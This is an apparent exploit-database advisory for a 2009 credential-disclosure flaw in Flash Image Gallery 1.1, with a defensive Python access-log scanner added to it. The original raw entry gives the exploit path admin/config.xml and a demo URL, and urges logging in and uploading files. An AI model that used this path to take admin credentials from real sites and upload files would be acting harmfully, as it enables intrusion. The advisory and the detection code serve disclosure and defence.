Vendor: Flash Image Gallery
By: DarkbiteX
CVSS: 7.5 (HIGH)
Vulnerability: Sensitive Data Disclosure
CWE: 200
Product Name: Flash Image Gallery
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: NO
Related CWE: N/A
CPE: a:flashimagegallery:flash_image_gallery
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Flash Image Gallery 1.1 Sensitive Data Disclosure

The vulnerability exists in Flash Image Gallery 1.1 and possibly the latest version. An attacker can access the config.xml file, which contains the admin username and password. The attacker can then use this information to gain access to the admin panel and upload malicious files.

Mitigation:

Restrict access to the config.xml file and ensure that the admin panel is password protected.
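
To check whether config.xml has already been served to outside clients, the following added example (not part of the original advisory or the Exploit-DB entry) scans web access logs for successful responses to admin/config.xml and lists later admin-panel requests from the same client. It assumes Apache/Nginx combined log format in chronological order; the sample log lines and the function name are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [26/May/2009:10:01:02 +0000] "GET /gallery/admin/config.xml HTTP/1.1" 200 412 "-" "Mozilla/5.0"
203.0.113.7 - - [26/May/2009:10:01:40 +0000] "POST /gallery/admin/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [26/May/2009:10:05:11 +0000] "GET /gallery/admin/config.xml HTTP/1.1" 403 199 "-" "curl/7.19"
192.0.2.44 - - [26/May/2009:10:07:30 +0000] "GET /gallery/index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.50 - - [26/May/2009:10:09:00 +0000] "GET /gallery/ADMIN/config.xml?x=1 HTTP/1.1" 200 412 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Case-insensitive on purpose: some servers resolve paths without regard to case.
CONFIG_RE = re.compile(r"/admin/config\.xml$", re.IGNORECASE)


def find_config_exposure(log_text):
    """Map client IP -> timestamps where admin/config.xml was served (2xx)
    and the admin-area requests that client made afterwards."""
    findings = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        # Drop the query string and decode %xx so encoded paths still match.
        path = unquote(m["target"].split("?", 1)[0])
        ip = m["ip"]
        if CONFIG_RE.search(path):
            if m["status"].startswith("2"):  # file content was actually returned
                entry = findings.setdefault(ip, {"served": [], "admin_after": []})
                entry["served"].append(m["ts"])
        elif ip in findings and "/admin/" in path.lower():
            findings[ip]["admin_after"].append(
                f'{m["method"]} {path} {m["status"]}'
            )
    return findings


if __name__ == "__main__":
    for ip, hit in find_config_exposure(SAMPLE_LOG).items():
        print(ip, hit)
```

Any client listed here has seen the stored admin credentials, so rotate them after restricting access; a non-empty admin_after list means the admin area was also used from that address.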

Exploit-DB raw data:

#########################################################################################
[0x01] Information:

Script         : Flash Image Gallery 1.1 and maybe last version
Download       : http://www.flashimagegallery.com/download/fig_116_admin_110.zip
Vulnerability  : Sensitive Data Disclosure
Author         : DarkbiteX
Greets         : |OverclockiX| , |0o_Zeuz_o0|, |Status-X|, |Fatal Inside|, |NaOnack|, |Good-Spide|, |All Moroccan Hackers|

########################################################################################
Bug:[Sensitive Data Disclosure]
########################################################################################

[!] EXPLOIT: /[path]/admin/config.xml
EXAMPLE: http://www.flashimagegallery.com/demo/gallery/admin/config.xml
                 and paste the user and pass http://www.flashimagegallery.com/demo/gallery/admin/
                
                 Use Of The Imagination and UPLOAD your archive ;) 
#########################################################################################

# milw0rm.com [2009-05-26]